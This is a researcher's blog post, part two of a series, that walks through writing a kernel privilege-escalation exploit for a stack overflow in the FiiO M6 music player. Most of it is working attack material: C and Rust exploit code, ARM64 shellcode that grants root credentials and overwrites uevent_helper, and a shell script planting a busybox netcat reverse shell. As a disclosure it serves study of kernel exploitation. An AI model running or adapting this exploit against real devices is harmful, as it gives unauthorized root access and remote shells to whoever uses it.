Overview:

A little over a month ago, I wrote a blog post detailing how I found a kernel vulnerability in the FiiO M6 Hi-Fi MP3 player. I would recommend reading that post first, but to recap:

The device is Android-based, running a version 3.18 AArch64 Linux kernel
The ftxxxx-debug entry in procfs has a write-handler which suffers from a straight forward stack-overflow. It reads an arbitrary amount of user-controlled data into a fixed size kernel buffer using the copy_from_user function

fiio_image

Having never done any kernel exploit dev, the thought of turning this bug into a weaponized privilege escalation initially felt out of the picture. However, upon further consideration, I realized this was essentially the “Hello World” of Linux exploitation on a real-world device; if I was gonna find an entry point into the field, this might as well be it. What followed was 30 days filled with reading, learning, and a LOT of waiting for the device to reboot after crashing. The remainder of this post will cover the technical details of the successful exploit, skimming over the extensive trial and error which took place. I may include a part 3 post or video recapping and reflecting on the project and going more in-depth on the learning process.

TL;DR:

The device does not have any stack canaries, so our overflow allows us to directly overwrite the saved x30 return pointer. While SMAP/SMEP are enabled, the kernel stack is marked as executable and KASLR is disabled. At the time of our overflow, register x21 always holds a pointer to somewhere in the kernel stack, which contains our user-controlled data. We can use the gadget blr x21 to jump to custom shellcode included in the overflow payload. Our shellcode performs a “HotPlugEater” attack, in which uevent_helper is overwritten to point to an attacker-controlled script, executing the malicious payload with root permissions. While there are numerous more “standard” ways to achieve the same effect once obtaining control over PC, the inability to do any kernel debugging and the lack of ARM64 Linux kernel exploitation resources presented significant hurdles.

Picking Up Where We Left Off:

Finding the Offset To The Saved Return Pointer:

At the end of the previous post, I released a Crash PoC for the vulnerability. It has been included again below:

  
use std::io::{Read, Write, stdin, stdout};
use std::fs::OpenOptions;
 
fn main() {
	// create our long payload
    let mut buf = vec![0x41u8; 32 * 1024];
    println!("{}", buf.len());

	// open /proc/ftxxxx-debug for writing
    let path = "/proc/ftxxxx-debug";
    let fd = OpenOptions::new().write(true).open(path);

    print!("Writing {:?}\n", path);
    if let Ok(mut fd) = fd {
		let fuzz_size = buf.len();
		let _ = fd.write(&buf[..fuzz_size]);    }
}

For this proof-of-concept code, I chose an arbitrarily long buffer (32 * 1024 bytes) which I knew would cause a crash. However, after confirming there were no stack canaries, the first step for the exploit was to determine the offset to the saved link register (x30). At the end of each function call in ARM64, this saved value is popped back off the stack into x30. Upon encountering a RET instruction, the program loads the value of x30 into the PC.

To determine the offset, I manually created random payloads and then checked what the PC value was in the kernel crash. After a few attempts, I was able to determine that the offset was 1024 bytes. As such, we can update the crash PoC to have the following payload:

  
// ... previous code ...
let mut buf = vec![0x41u8, 8 * 128]; // 1024 bytes of junk 0x41s
let mut buf1 = vec![0x42u8, 8]; // 8 bytes of 0x42, overwriting our saved x30 address
buf.append(&mut buf1);
// ... previous code ...

Reviewing the kernel panic now, the PC is filled with our 8 0x42s, indicating that we have successfully found the offset to the saved x30 value and can redirect program execution.

kernel_panic_offset

Obtaining the Kernel Symbols:

The next step of the process was to obtain kernel symbols. While our shell user does have read permissions to /proc/kallsyms, kptr_restrict is set to 2 and thus all the addresses are shown as 0.

kptr_restrict

After a bit of digging, I found a GitHub repo dedicated to extracting symbols from ARM64 Android Kernel images. I was able to obtain the firmware for the FiiO M6 directly from their website. Extracting the provided zip file was enough to obtain the kernel image individually. Using it with the script from GitHub, we can dump all the kernel symbols! Since there’s no KASLR, these are static values which we can hardcode into our exploit.

ksyms_finder

Kernel Debugging?

Since this was my first kernel exploit ever, I was really hoping to get some form of a debug set-up working. I assumed the contents inside the FiiO firmware package would be enough to get an emulated kernel up and running. However, after a week of attempting, I had made no progress. I am still fairly confident it can be done, but I couldn’t figure it out and didn’t want to spend any more time on it. I switched gears a bit and tried to patch the bootloader to root the device, but this also proved unsuccessful. I decided to proceed with no debugging capabilities, and return only if I couldn’t figure out how to craft an exploit without them.

Exploitation:

Initial Strategy:

Now that we have kernel symbols and the ability to redirect program execution, it’s time to come up with an exploit strategy. After a few days of learning about Linux privesc exploit techniques, I decided that using the classic commit_creds(prepare_kernel_cred(NULL)) path would probably be best. You can learn more about this privesc strategy here but the quick summary is:

prepare_kernel_cred creates a root-privileged cred when called with a NULL argument
commit_creds takes a pointer to a cred structure, and sets the current process to have that privilege level

Therefore, commit_creds(prepare_kernel_cred(NULL)) sets the process’s privilege level to root. After that, we just return execution out of kernel mode and back to our userland process.

Surely The Stack Isn’t Executable, Right…?

With our exploit strategy in mind, I set out to write a ROP chain. There are almost no publicly available resources on ARM64 kernel ROP, but I was able to find some useful posts about userland exploitation, such as a post from Perfect Blue and a talk from Billy Ellis.

As the architecture expands in popularity, maybe one day we will see more write-ups on the subject. Today, however, is not that day. About midway through struggling to craft and debug a proper ROP chain, I spotted something interesting. The x21 register pointed to an area on the stack which we could overflow with anything we wrote after overwriting the saved x30 value. For example, we can use the following code:

  
uint64_t fake_ret_addr = 0x4242424242424242ULL;  
uint64_t x21_overflow = 0x4343434343434343ULL;  
  
static int exploit() {  
  int fd;  
  fd = open("/proc/ftxxxx-debug", O_RDWR);  
  unsigned char buf[4096];  
  memset(buf, 0x41, 1);  
  memset(buf+1, 0x0, 1023);  

  uint64_t *chain = (uint64_t *)&buf[1024];  
  *chain++ = (uint64_t)fake_ret_addr;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  

  write(fd, buf, 4096);  
  return 0;  
}

And now reviewing the crash logs, we can see that x21 holds our 0x43s

x21_overflow

I had been under the assumption that the stack was not executable, but I decided there was no harm putting this belief to the test. I used ropper to find a blr x21 gadget and overwrote the saved x30 with it. This would redirect code execution to the pointer stored in x21.

  
uint64_t kernel_base = 0xFFFFFFC000080000ULL;  
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;

// ... previous code ...
  uint64_t *chain = (uint64_t *)&buf[1024];  
  *chain++ = (uint64_t)blr_x21;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  
  *chain++ = (uint64_t)x21_overflow;  

If the stack was executable, this address would then be deference and our junk data would be interpreted as code. It’s at least seemed worth a shot…

pc_eq_x21

We can see above that our PC value and x21 value are the same, indicating that our ROP chain seems to have executed properly. We also get the following line from the end of the kernel panic:

call_trace_x43

This error message seems to indicate that our 0x43s are being interpreted as valid instructions, but it’s still hard to tell. Maybe the error message is just a fluke?

I changed the entire chain to be NOPs, except the last line, which was still our x21_overflow junk data.

  
uint64_t nop = 0xd503201fd503201f;

// ... previous code ...
  uint64_t *chain = (uint64_t *)&buf[1024];  
  *chain++ = (uint64_t)blr_x21;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  

// ... continue chain

  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)x21_overflow;  

If the code on the stack was actually executing, it would go down the NOP sled before throwing the same error. Furthermore, our PC would now point to a different address than x21, since it successfully executed instructions.

x21_neq_pc nop_code_trace

I was honestly in disbelief that this worked. We now have a very simple gadget which reliably allows us to jump to our own shellcode, executing in supervisor mode (EL1).

Writing The Shellcode:

The obvious next step was to come up with our shellcode. In order to do that, we need to grab the addresses for both commit_creds and prepare_kernel_cred

prepare_and_commit_addr

After that, we can start putting together some ARM64 assembly:

mov x0, xzr              // move 0x0 into x0 
mov x2,  #0x6368         // mov addr of prepare_kernel_cred into x2
movk x2, #0x000b, lsl #16  
movk x2, #0xffc0, lsl #32  
movk x2, #0xffff, lsl #48  
blr x2                   // branch to addr in x2
mov x4,  #0x5ffc         // mov addr of commit_creds into x4
movk x4, #0x000b, lsl #16  
movk x4, #0xffc0, lsl #32  
movk x4, #0xffff, lsl #48  
blr x4                   // branch to addr in x4

...

This code works as follows:

Move 0x0 into x0. ARM64 specifies that x0 will always hold the first argument when a function is called. We want the argument passed to prepare_kernel_cred to be NULL, which is equivalent to 0x0
Load the address of prepare_kernel_cred into x2 and branch to it
The return value of prepare_kernel_cred is a pointer to the newly created credential. ARM64 specifies that all return values will be passed back to the callee in x0. This works out for us, because the next step is to call commit_creds with a pointer to our cred argument in x0. Thus we don’t have to do anything when prepare_kernel_cred returns
Load the address of commit_creds into x4 and branch to it.

After this, we need to switch out of supervisor mode and cleanly return to userland. This is where things became significantly less straightforward. A few things need to happen:

We need to specify what address to return to
We need to restore the userland stack pointer
We need to set saved program status registers

The good news is that because x21 consistently holds a pointer into our user-controlled data, we can pass a userland stack pointer and userland return value via our buffer overflow payload.

To debug this, we will compile the above shellcode which doesn’t yet return from supervisor mode. We will make the last instruction 0x41414141, causing a kernel panic and allowing us to dump the register states. Our exploit payload will include a bogus stack pointer and the address of the function we wish to return to. We can then review the kernel panic logs in order to determine the offsets and finish out our shellcode. In all, our exploit functions look as follows:

  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
#include <iostream>  
#include <fcntl.h>  
#include <unistd.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <unistd.h>  
#include <sys/mman.h>  
#include <sys/types.h>  
#include <sys/wait.h>  
#include <spawn.h>  
  
uint64_t kernel_base = 0xFFFFFFC000080000ULL;  
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;  
uint64_t nop = 0xd503201fd503201f;  
uint64_t junk = 0x4242424242424242ULL;  
  
static int win() {  
  puts("[+] Returned from supervisor mode\n");  
  char *argv[] = { "busybox1.11", "touch", "/data/local/tmp/test.txt", NULL };  
  char *envp[] = { NULL }; 
  puts("[!] Win\n")
  execve("/system/bin/busybox1.11", argv, envp); 
  return 0;  
}  
  
static int exploit() {  
  int fd;  
  fd = open("/proc/ftxxxx-debug", O_RDWR);  
  unsigned char buf[4096];  
  memset(buf, 0x41, 1);  
  memset(buf+1, 0x0, 1023);  

  uint64_t stack_size = 0x1000;  
  void *stack_base = mmap(NULL, stack_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);  
  if(stack_base == MAP_FAILED) {  
    puts("[!] mmap failed!");  
    return -1;  
  }  
  void *stack_top = (void *)((uint64_t)stack_base + stack_size);
  printf("[+] Stack Pointer: %llx\n", (uint64_t)&stack_top);
  printf("[+] win() address: %llx\n", (uint64_t)&win);

  unsigned char shellcode[] = {  
    0xe0, 0x03, 0x1f, 0xaa, 0x02, 0x6d, 0x8c, 0xd2,  
    0x62, 0x01, 0xa0, 0xf2, 0x02, 0xf8, 0xdf, 0xf2,  
    0xe2, 0xff, 0xff, 0xf2, 0x40, 0x00, 0x3f, 0xd6,  
    0x84, 0xff, 0x8b, 0xd2, 0x64, 0x01, 0xa0, 0xf2,  
    0x04, 0xf8, 0xdf, 0xf2, 0xe4, 0xff, 0xff, 0xf2,  
    0x80, 0x00, 0x3f, 0xd6,  
    0x41, 0x41, 0x41, 0x41,   // Bad Instruction to cause kernel panic
  };  

  uint64_t *chain = (uint64_t *)&buf[1024];  
  *chain++ = (uint64_t)blr_x21;  
  *chain++ = (uint64_t)junk;  
  *chain++ = (uint64_t)junk;  
  *chain++ = (uint64_t)junk;  
  *chain++ = ((uint64_t)&win);  
  *chain++ = (uint64_t)((uint64_t)&stack_top);  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  

  memcpy(buf + 1216, shellcode, sizeof(shellcode));  
  puts("[+] Ropping to shellcode...");  
  write(fd, buf, 1024 + 1216 + sizeof(shellcode));  
  return 0;  
}  
  
int main() {  
  std::cout << "[+] Starting trigger...\n";  
  exploit();  
  return 0;  
}

Running it, we get a kernel panic as expected.

all_regs_kernel_crash

Lets break down the kernel crash logs. First of all, we see that x0 is equal to 0x0. This is what we want to see - commit_creds returns a 0 if completed execution without issue, so we can take this as an indicator that our shellcode was able to successfully execute. Also note that x21 is equal to 0xffffffc01521fec8.

Scrolling down, the crash dump gives us the data where x21 is currently pointing. Note that data before and after the actual pointer is shown (x21 is pointing at the fec8 line).

x21_contents

We can note that our win() address (0x0000000078942300) is stored at x21 - 0x80. The next 8 bytes are our bogus stack pointer which we mmapped before the payload. With this information, we can finish out our shellcode to return to usermode:

// ... previous code ...
sub x2, x21, #0x80  // store pointer to win address in x2
ldr x1, [x2]        // deref pointer into x1. x1 now holds win() address
ldr x4, [x2, #0x08] // deref pointer+0x8 into x4. x4 now holds fake stack pointer
mov x0, xzr         // move 0 into x0 
MSR SP_EL0, x4      // set EL0 (usermode) stack pointer to x4
MSR ELR_EL1, x1     // set EL1 (kernelmode) return address to x1
MSR SPSR_EL1, x0    // set status regs to 0x0
ERET

Game over, right?

segfault

Not quite. We do successfully return from supervisor mode with our elevated privs. However, as soon as we try to make another syscall, the program segfaults. The device itself doesn’t crash, but our program stops running. Because we did elevate our privs on the process itself, we have root for a nanosecond, but we can’t even do anything interesting with it.

I spent over a week trying to debug this issue (which looking back on it, was way too much time). The segfault almost certainly stemmed from the ugly way the shellcode ERET back to userspace without taking into account the previous state, the call stack, or any other information. I tried numerous techniques to save / restore the state and jump to different areas of my code, but nothing seemed to work. Being so close to having a root shell, I was reluctant to step back and try a different approach. But after officially running out of ideas, I went back to the drawing board.

Back To The Drawing Board:

To recap, we currently have the following:

Read, write, and execute primitives in EL1 (supervisor mode)
The ability to return from supervisor mode without crashing the kernel, but without being able to make another syscall or fork our current process.

With this information, I went to Google and started poking around. I should also shout out some friends in one of my private exploit dev discords who provided a few suggestions. In the end, however, it was a random slidedeck from 2016 which gave the breakthrough.

The HotplugEater Attack:

This presentation by dong-hoon you presented a technique he called the HotplugEater Attack. I have included the relevant slide below:

hotplug_eater_slide

The idea is as follows:

The global variable uevent_helper points to a script which the kernel uses on a hotplug event.
If we can overwrite this variable to point to an attacker controlled script, it will execute with root permissions.
Simply changing the variable is enough to trigger the kobject_uevent_env function, which will in turn call our malicious script.

Putting It All Together:

We can dump the address of uevent_helper with the Python script we used earlier.

Our new exploit will now work as follows:

Create a script in /data/local/tmp/ which we want to execute with root permissions
Trigger our overflow on ftxxxx-debug and ROP to our shellcode
The shellcode will overwrite uevent_helper with the path to our malcious script in /data/local/tmp, return to usermode, and gracefully exit (by way of segfaulting).
After ~10 seconds, the kernel will execute our script

With this in mind, we need to write some new shellcode which performs the actions outlined in point number 3. That shellcode has been included and commented below:

mov x2,  #0xc7c8          // move the address of `uevent_helper` into x2
movk x2, #0x00c2, lsl #16  
movk x2, #0xffc0, lsl #32  
movk x2, #0xffff, lsl #48  
  
mov w3, #'/'              // store the value `/data/local/tmp/cmd` byte by byte at x2 
strb w3, [x2]  
mov w3, #'d'  
strb w3, [x2, #1]  
mov w3, #'a'  
strb w3, [x2, #2]  
mov w3, #'t'  
strb w3, [x2, #3]  
mov w3, #'a'  
strb w3, [x2, #4]  
mov w3, #'/'  
strb w3, [x2, #5]  
mov w3, #'l'  
strb w3, [x2, #6]  
mov w3, #'o'  
strb w3, [x2, #7]  
mov w3, #'c'  
strb w3, [x2, #8]  
mov w3, #'a'  
strb w3, [x2, #9]  
mov w3, #'l'  
strb w3, [x2, #10]  
mov w3, #'/'  
strb w3, [x2, #11]  
mov w3, #'t'  
strb w3, [x2, #12]  
mov w3, #'m'  
strb w3, [x2, #13]  
mov w3, #'p'  
strb w3, [x2, #14]  
mov w3, #'/'  
strb w3, [x2, #15]  
mov w3, #'c'  
strb w3, [x2, #16]  
mov w3, #'m'  
strb w3, [x2, #17]  
mov w3, #'d'  
strb w3, [x2, #18]  
mov x3, xzr               // terminate our string with a null byte by moving 0x0 into x3 and storing x3 at x2 + 19
str x3, [x2, #19]  
  
sub x2, x21, #0x80        // ret to our win() function the same way we did in the previous shellcode
ldr x1, [x2]  
ldr x4, [x2, #0x08]  
mov x0, xzr  
MSR SP_EL0, x4  
MSR ELR_EL1, x1  
MSR SPSR_EL1, x0  
ERET

We can create an exploit bash script which does the following:

  
!/system/bin/sh
echo "[+] Creating malicious script at /data/local/tmp/cmd..."  
echo "#!/system/bin/sh" >> /data/local/tmp/cmd  
echo "/system/bin/busybox1.11 nc 127.0.0.1 4444 -e /system/bin/sh" >> /data/local/tmp/cmd  
chmod 777 cmd

echo "[+] Starting exploit..."  
/data/local/tmp/poc 2>/dev/null  
sleep 5

echo "[+] Launching listener..."  
echo "[!] Wait for r00t shell..."  
/system/bin/busybox1.11 nc -lp 4444

This script will create a new bash file at /data/local/tmp named cmd, which lines up with our shellcode. cmd’s only function is to forward a shell to a localhost listener on port 4444.

The script then runs our exploit code, which will overwrite the uevent_helper variable to point at our cmd file. Finally, we launch a listener on port 4444 waiting for the kernel to execute the cmd file, giving us a root shell.

whoami_root

The full exploit code can be found on my GitHub.

Next Steps:

While this project is pretty much over, the last thing I would love to do is pack the exploit into an APK and give users the ability to root their device.

I also have some other Android based devices laying around the house, such as the HiSense Touch and the Onyx Pocket 2. This project has been a ton of fun, so maybe I will pick one of those to target in the future.

If you enjoyed this post and want to stay up to date on my future research projects, feel free to give me a follow on Twitter.

Rooting the FiiO M6 - Part 2 - Writing an LPE Exploit For Our Overflow Bug